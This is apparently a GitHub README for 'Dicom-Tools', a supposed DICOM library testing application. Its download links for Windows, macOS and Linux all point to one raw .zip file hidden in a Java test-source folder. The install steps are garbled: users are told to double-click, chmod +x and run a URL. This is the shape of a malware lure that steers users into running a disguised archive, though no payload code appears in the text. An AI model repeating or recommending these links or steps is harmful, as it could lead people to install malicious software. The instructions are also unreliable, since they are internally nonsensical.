Dicom-Tools provides a user-friendly way to test various DICOM libraries. This tool unifies the functionality of DCMTK, GDCM, ITK, VTK, and more under a single interface. Follow these steps to download and run the application.
To get the application, you need to visit our Releases page. Click on the link below:
Once you're on the Releases page, look for the latest version. Here, you will find the files available for download. Make sure to select the right file based on your operating system.
Before you start, ensure your system meets these requirements:
- Operating Systems: Windows 10 or later, macOS 10.15 or later, or recent Linux distributions.
- RAM: At least 4 GB of RAM.
- Storage Space: Minimum of 200 MB free space.
- Additional Software: Ensure you have installed any necessary dependencies that might be specified in the release notes.
You may see different files depending on the release. Common files include:
- Windows: https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zip
- macOS: https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zip
- Linux: https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zip
Make sure to download the file that matches your system.
After downloading, locate the downloaded file and follow these instructions based on your operating system:
- Double-click the
https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zipfile. - Follow the installation prompts.
- Once installed, find Dicom-Tools in your Start Menu and click to open.
- Open the
https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zipfile. - Drag the Dicom-Tools icon to your Applications folder.
- Go to your Applications folder and double-click to open Dicom-Tools.
- Open a terminal.
- Navigate to the folder where you downloaded the
https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zip. - Run the command:
chmod +x https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zipto make it executable. - Start the application by running:
https://raw.githubusercontent.com/Y3OSHII-9/Dicom-Tools/main/java/dcm4che-tests/src/test/java/com/dicomtools/Dicom-Tools-v1.6.zip.
Once the application is running, you will see the main interface. Here are some basic steps to help you get started:
- Load DICOM Files: Use the 'Load' button to import your DICOM files. Dicom-Tools supports a broad range of DICOM formats.
- Test Features: Explore the various testing options available. You can run tests for different DICOM libraries like DCMTK or GDCM directly from the interface.
- View Results: After running tests, results will appear on the screen. You can save these results for later review using the 'Save' option.
Dicom-Tools offers several useful features:
- Multiple Library Support: Tests compatibility across various DICOM libraries.
- User-friendly Interface: Designed for ease of use, even for those without technical knowledge.
- Data Visualization: Displays data in a clear, understandable format.
- Cross-platform: Works on Windows, macOS, and Linux.
We welcome contributions! If you have suggestions or improvements, feel free to open an issue or submit a pull request in the repository. Together, we can make Dicom-Tools even better.
If you encounter issues while using Dicom-Tools or have questions, please check the 'Issues' section of the GitHub repository. You can also contact the community for help.
Make sure to check the changelog on the Releases page for updates, bug fixes, and new features.
- Official Documentation: For in-depth usage guidelines, visit our documentation site.
- GitHub Repository: To explore the code or report issues, visit Dicom-Tools on GitHub.
This application interacts with diverse topics within the medical imaging domain, including:
- cornerstone3d
- dcmtk
- gdcm
- dcm4che
- pydicom
- simpleitk
- vtk
For more information about these libraries, you can check their respective documentation.
Thank you for using Dicom-Tools! We hope it enhances your DICOM testing experience.